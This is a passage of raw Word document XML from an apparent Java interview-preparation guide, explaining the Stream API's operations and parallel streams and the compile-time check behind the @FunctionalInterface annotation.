          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>map, filter, reduce, and collect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be applied to data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B535DC7"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p w14:paraId="28417655"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are evaluated lazily, meaning that operations on a stream are not executed until a terminal operation (like collect(), forEach(), etc.) is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726568F4"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allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>efficient pipeline processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37783CD2"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able Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC2189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streams are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chainable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, allowing for complex data processing in a single, concise statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2335F33B"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p w14:paraId="67C0F5DF"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eam API allows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to be processed concurrently, making use of multi-core processors to improve performance for large data sets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A56B3D"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Mutating:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150FED5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don't modify the source data. Operations on streams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always return a new stream or result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F10BE8E"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Concepts of Stream API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B1DE8"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p>
    <w:p w14:paraId="086742B3"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eam represents a sequence of elements and supports operations to process those elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C76725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two types of operations: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>intermediate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lazy) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>terminal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (eager).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670D5EF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p>
    <w:p w14:paraId="070181E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do not execute until a terminal operation is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE12FA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filter(), map(), distinct(), sorted(), peek().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEE882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p>
    <w:p w14:paraId="45EA9351"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erminal operations </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the processing of the stream and return a result (or perform an action).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53225F05"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collect(), forEach(), reduce(), count(), min(), max().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A41F6D"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of Stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5685E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can be created from various sources, such as collections, arrays, or I/O channels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415C62BC"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stream sources include: Collection.stream(), Arrays.stream(), Stream.of(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1044A28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 API in Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C2C4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Filtering and Collecting Elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA5B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filter out the numbers that are less than 5 and then collect the result into a new list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02BA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36C40C1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A1046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D6A209A" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B71BAD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0518BBF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EFDD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2D003243" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B94F57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Stream API to filter and collect the numbers greater than 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C99371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result = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE225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Intermediate operation: filter numbers greater than 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB50F9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 collect to a list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F23C47C" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A359E7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6, 7, 8, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D17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A08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FD4613"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and reduce() for Transformation and Aggregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975FC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transform a list of integers into their squares and then sum them up using map() and reduce().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B09A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158F2E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0F034DD" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A28C38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58E2B3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1555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98BC5B8" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="722CF3C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map to square the numbers and reduce to sum them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419185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6B454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Intermediate operation: square each number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F284CF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 // Terminal operation: sum all squared numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581E9AA4" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291F74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um of squares: " + sum); // Output: Sum of squares: 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CF98B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159B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7BFA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Parallel Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4506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rocess the stream elements in parallel using the parallelStream() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C5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0A1B35B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0E88944" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E6E31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4BA317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615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C32A63D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E203F7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parallelStream() to process the list in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263063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295D252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756665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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7459DC13" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365CABA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parallel): " + sum);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C311A8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D37B1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27121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tream Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED5D7C"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tering (filter())</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based on a condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04283E2F"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ilter(n -&gt; n &gt; 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E64647"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ing (map())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Transforms elements of the stream into another form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B22C3EC"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map(String::toUpperCase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2FC1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sorted())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sorts the stream elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164CEF05"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sorted()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207A5A4D"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tion (reduce())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Performs a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reduction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operation, such as summing or multiplying elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E6FA6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reduce(0, Integer::sum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08208D9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ng (collect())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collects the elements of the stream into a collection, such as a list, set, or map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E3D93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collect(Collectors.toList())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37107E73"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Each (forEach())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Iterates through the elements of the stream and performs an action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECFE476"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orEach(System.out::println)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C3ECF"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Stream API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31827107"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Stream API allows you to write more concise, declarative code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436ED9C"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Streams can be processed in parallel, making use of multi-core processors for performance improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A46723A"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Operations on streams are evaluated lazily, optimizing the process by reducing unnecessary computations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B99254F"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paration of concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stream operations separate the logic of processing data from the logic of iterating over it, making code easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D394CD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A45F221"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dern way to process data in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4866B8E6"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for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional-style programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a focus on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operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D03263"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powerful operations like filter(), map(), reduce(), and collect(), and supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for improved performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929C9D7"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promotes cleaner, more readable, and maintainable code for working with collections and other data sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EABF3A4" w14:textId="603DCEA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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1C423" w14:textId="77777777" w:rsidR="0066672F" w:rsidRPr="00CE4B95" w:rsidRDefault="0066672F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="234" w:name="_Toc197867448"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @FunctionalInterface annotation? Will it be checked manually or by the compiler?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="234"/>
    </w:p>
    <w:p w14:paraId="0760FAF7" w14:textId="6749FA8F"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unctionalInterface annotation is used to indicate that an interface is intended to b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nd it can have multipl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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E88827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FunctionalInterface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4601D39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arks a Functional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The annotation tells the compiler that the interface is intended to be functional, i.e., it should have exactly one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E2E54"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Enforces the Rule</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you use @FunctionalInterface and the interface does not meet the criteria (having more than one abstract method, for example), the compiler will raise an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E41F63"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onal but Recommended</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Using @FunctionalInterface is optional, but it's recommended for clarity and to take advantage of compiler checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7194EEC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ility with Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A functional interface can be used as the target type for lambda expressions or method references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7998617D"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unctional Interface with @FunctionalInterface annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E0F0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0177FEC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7374DCD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yMethod(); // Single abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654852A8" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2297F1D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A2593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4EA32E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6549612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21B81D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A1164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29E0E1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34A56D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45F33F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02AB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D49E0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 of the @FunctionalInterface annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BE642D"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Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When you use @FunctionalInterface, the compiler checks if the interface indeed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If the interface has more than one abstract method, the compiler will give an error. This check is done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by the compiler at compile-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B160E0E"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anual Checks Needed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You do not need to manually verify if the interface follows the rules of a functional interface. The compiler will handle it for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582604B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Compiler Error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590450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AB45E1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InvalidFunctionalInterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A04E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 // Abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9D68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 // Abstract method (violates functional interface rule)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED7A1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616EB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you will get the following compile-time error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E2382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InvalidFunctionalInterface is not a functional interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9114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ED7ADC6"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Interface annotation helps make your intent clear and enables the compiler to validate whether the interface adheres to the rules of a functional interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433272DA"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face does not conform to the rules (i.e., more than one abstract method), the compiler will raise an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016CDA95"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>checked by the compiler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at compile time, and you don't need to manually check it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C021E99" w14:textId="425F0EF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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F6297D" w14:textId="58DA95FD" w:rsidR="00D71256" w:rsidRPr="00CE4B95" w:rsidRDefault="00D71256">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="235" w:name="_Toc197867449"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r w:rsidR="00755AEE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Map and FlatMap in stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
